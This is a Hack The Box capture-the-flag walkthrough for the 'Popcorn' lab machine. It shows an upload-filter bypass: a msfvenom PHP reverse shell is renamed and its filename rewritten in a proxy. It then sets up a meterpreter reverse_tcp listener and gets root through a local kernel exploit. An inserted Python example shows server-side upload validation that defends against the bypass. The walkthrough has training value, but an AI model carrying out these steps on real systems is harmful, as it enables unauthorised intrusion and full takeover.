(HTB) Popcorn Walkthrough
Name: Popcorn
IP: 10.10.10.6
OS: Linux
VM Author: ch4p
Writeup Author: Teck_K2
Nmap result
Port 80 is open, so we start enumerating it with Nikto and dirb.
Nikto couldn't find anything interesting, but with dirb we find a new directory called torrent.
So we go to that directory: 10.10.10.6/torrent
Here we can sign up and upload only .torrent files, so we can't upload a shell directly.
So we create a new .torrent file and upload it; now we have access to upload a screenshot, which can be jpg, jpeg, png or gif. Open a new terminal and generate a web payload with msfvenom.
The generated file is base64 encoded, so open it in an editor and add <?php at the beginning of the base64 blob and ?> at the end.
Now change its extension from .php to .php;.png
We do this because the upload form has an image-file restriction that only allows image files, but the check is enforced only in the browser, not on the server. So we capture the request, change the extension and forward the message to the server.
So our new file name is shell.php;.png. Upload it, but this alone won't give us a shell because the name ends in .png; we need a .php file on the server, which the upload form does not allow, as said above.
So we need to tamper with the request, which we can do with Burp Suite or the Tamper Data extension in Firefox.
Just search for filename="shell.php;.png", edit it to "shell.php" and forward it.
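The weakness used above is that the image check lives only in the browser, so anything the proxy rewrites reaches the server unchecked. As an added example (not code from the walkthrough or from the torrent hoster, whose PHP is not shown here), the following Python validator shows what a server-side check would have to do: reject names with extra separators or more than one extension, require an allow-listed extension, require the file body to start with that type's magic bytes, and store the accepted file under a server-generated name so the client's filename never reaches disk. The allow-list, the function names and the sample bodies are all constructed for this example.

```python
import os
import secrets
from typing import Optional, Tuple

# Allowed screenshot types and the magic bytes each must begin with.
# Constructed allow-list for this example; the real upload handler is PHP
# and is not shown in the walkthrough.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Server-side check of a screenshot upload.

    Returns (accepted, reason). Both the client-supplied name and the file
    body are checked, so renaming the multipart field in a proxy (the
    shell.php;.png -> shell.php trick) does not get past it.
    """
    base = os.path.basename(filename)
    if not base or base != filename:
        return False, "path components not allowed"
    if any(c in base for c in ";\x00"):
        return False, "forbidden character in filename"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    # The body must really be an image of the claimed type: a PHP file
    # renamed to .png fails here even if the name passed every check above.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "file content does not match claimed image type"
    return True, "ok"


def safe_stored_name(filename: str, data: bytes) -> Optional[str]:
    """Name under which an accepted upload is stored on disk.

    The stored name is random and its extension comes from the validated
    type, never from the user's string, so the original filename cannot
    influence how the web server later serves the file.
    """
    ok, _ = validate_upload(filename, data)
    if not ok:
        return None
    ext = filename.lower().rsplit(".", 1)[1]
    if ext == "jpeg":
        ext = "jpg"
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample bodies: a harmless PHP snippet and a minimal PNG header.
PHP_BODY = b"<?php echo 'constructed sample'; ?>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, body in [
        ("shell.php;.png", PHP_BODY),  # the renamed upload from the walkthrough
        ("shell.php", PHP_BODY),       # the name after tampering in the proxy
        ("shell.png", PHP_BODY),       # PHP body hiding behind an image extension
        ("shot.png", PNG_BODY),        # a genuine screenshot
    ]:
        print(name, validate_upload(name, body), safe_stored_name(name, body))
```

Even with this check in place, the upload directory should be served with script execution disabled; the validator prevents the file from landing, and the server configuration prevents it from running if something does.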
The file should be uploaded now. Refresh the page and open msfconsole:
# use exploit/multi/handler
# set payload php/meterpreter/reverse_tcp
# set LHOST <IP>
# set LPORT 4444
# run
Now go to the browser and open the uploaded screenshot in another tab.
We get a meterpreter session.
Now we have access to the user directory and the user flag, but we can't access the root directory, so we need to do privilege escalation.
We know the kernel version is 2.6.17-36, from the nmap result; you can also check it in the meterpreter session we have.
Now find an exploit which escalates privileges and gives us root access to the machine.
Search with searchsploit; if we are lucky we'll find an exploit.
I tried all of these local .c files but got no result. After searching a lot I found this
The exploit ID is 15704. Let's try this one.
If you have a reverse shell in nc, create a new torrent file and upload it, then copy the file from /var/www/torrent/upload to /tmp; if you have a meterpreter session like me, you can upload directly to /tmp.
Now compile the file and execute it:
# gcc filename.c -o filename
# ./filename
Now type id and you will see that you have root access; read the flag from /root.
~Enjoy hacking and stay NOOB